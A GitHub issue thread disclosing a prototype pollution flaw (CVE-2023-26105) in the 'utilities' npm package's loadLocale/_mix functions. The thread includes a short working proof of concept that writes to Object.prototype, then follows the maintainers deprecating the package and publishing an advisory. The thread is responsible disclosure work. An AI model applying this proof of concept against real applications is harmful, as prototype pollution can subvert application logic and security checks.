Prototype Pollution using utilities.i18n.loadLocale()

[lelecolacola123]

Hi,There's a prototype pollution vulnerability in function _mix() in utilities/lib/core.js, the risk locate is in here: https://github.com/mde/utilities/blob/ba6be1fd1abe7541f5965c0bf831f127e42da815/lib/core.js#L65 https://github.com/mde/utilities/blob/ba6be1fd1abe7541f5965c0bf831f127e42da815/lib/core.js#L41

and the POC is: var utilities = require("utilities") bad_objects= {test:"123"} console.log("Before:"+{}.test) utilities.i18n.loadLocale("proto",bad_objects,{},true) console.log("After:"+{}.test)

In the file i18n.js, there is a function called loadLocale, which calls the mixin function in utilities/lib/core.js, and it calls the _mix function in 22 lines, and in the _mix function, where the object is merged, resulting in prototype pollution

More information about the vulnerability: https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf

[phanect]

@mde Snyk send us an email regarding to this vulnerability, so can you check your mailbox? I replied to the email at Feb. 25th 8:00pm UTC.

If you no longer have time to maintain this package, how about deprecating this package for now?

I checked the dependencies on npm and there were no packages actively maintained, so I believe there is minimum impact. https://www.npmjs.com/browse/depended/utilities

I found I have a permission to control this package on npm, so if you agree with deprecating utilities package, I can deprecate it on behalf of you.

In addition, Snyk will assign CVE for this vulnerability and I guess it would be reported by npm audit soon.

[mde]

@phanect, that would be much appreciated. どうもありがとうございます！

[phanect]

@mde Thanks for the reply. So you mean I can deprecate the package?

[mde]

Yes, please. And thank you very much!

[phanect]

OK, I will deprecate it later. Thanks for confirmation 🙇

[mde]

🫡🫡🫡🫡

[phanect]

I have deprecated this utilities package on npm.

I keep this issue open so that you can resolve this vulnerability in case you want to restart the maintenance for utilities in the future.

[phanect]

@mde I think we should also flag this package on npmjs.com so that npm audit can tell the users this package is vulnerable.

I asked npm support how to register the vulnerability on npmjs.com, and they told me that we could register by creating a security advisory on GitHub. https://docs.github.com/en/code-security/security-advisories/repository-security-advisories/creating-a-repository-security-advisory

Can you create a security advisory? Snyk has already reserved a CVE identifier as CVE-2023-26105, so please associate this CVE identifier when you create the security advisory.

Or if you temporarily give me permission to this repository, I will publish a security advisory on your behalf. (However, the Admin role is required.)

[phanect]

@mde I found I could send an update request to GitHub's vulnerability database from the link of CVE-2023-26105 by myself, so I have sent the request. Therefore, you no-longer have to write a security advisory.

It has been published and now npm audit warns of the vulnerability.

$ cat package.json 
{
  "name": "test",
  "version": "1.0.0",
  "license": "UNLICENSED",
  "dependencies": {
    "utilities": "latest"
  }
}
$ npm install
npm WARN deprecated utilities@1.0.6: This package is no longer maintained and vulnerability exists.

added 1 package, and audited 2 packages in 394ms

1 high severity vulnerability

Some issues need review, and may require choosing
a different dependency.

Run `npm audit` for details.
$ npm audit
# npm audit report

utilities  *
Severity: high
mde utilities contains Prototype Pollution - https://github.com/advisories/GHSA-wxfj-84xf-7gxv
No fix available
node_modules/utilities

1 high severity vulnerability

Some issues need review, and may require choosing
a different dependency.

I think that's all for the response to this vulnerability.

[mde]

Thank you!

On Mon, Mar 6, 2023 at 2:45 PM Jumpei Ogawa @.***> wrote:

I found I could send an update request to GitHub's vulnerability database from the link of CVE-2023-26105 https://github.com/advisories/GHSA-wxfj-84xf-7gxv, so I have sent the request https://github.com/github/advisory-database/pull/1751.

It has been published and now npm audit warns of the vulnerability.

$ cat package.json { "name": "test", "version": "1.0.0", "license": "UNLICENSED", "dependencies": { "utilities": "latest" } } $ npm install npm WARN deprecated @.***: This package is no longer maintained and vulnerability exists.

added 1 package, and audited 2 packages in 394ms

1 high severity vulnerability

Some issues need review, and may require choosing a different dependency.

Run npm audit for details. $ npm audit# npm audit report

utilities * Severity: high mde utilities contains Prototype Pollution - https://github.com/advisories/GHSA-wxfj-84xf-7gxv No fix available node_modules/utilities

1 high severity vulnerability

Some issues need review, and may require choosing a different dependency.

I think that's all for the response to this vulnerability.

— Reply to this email directly, view it on GitHub https://github.com/mde/utilities/issues/29#issuecomment-1457158436, or unsubscribe https://github.com/notifications/unsubscribe-auth/AAAAF5KWM3G2AGNYCO3KJE3W2ZSJNANCNFSM6AAAAAATKOE45Y . You are receiving this because you were mentioned.Message ID: @.***>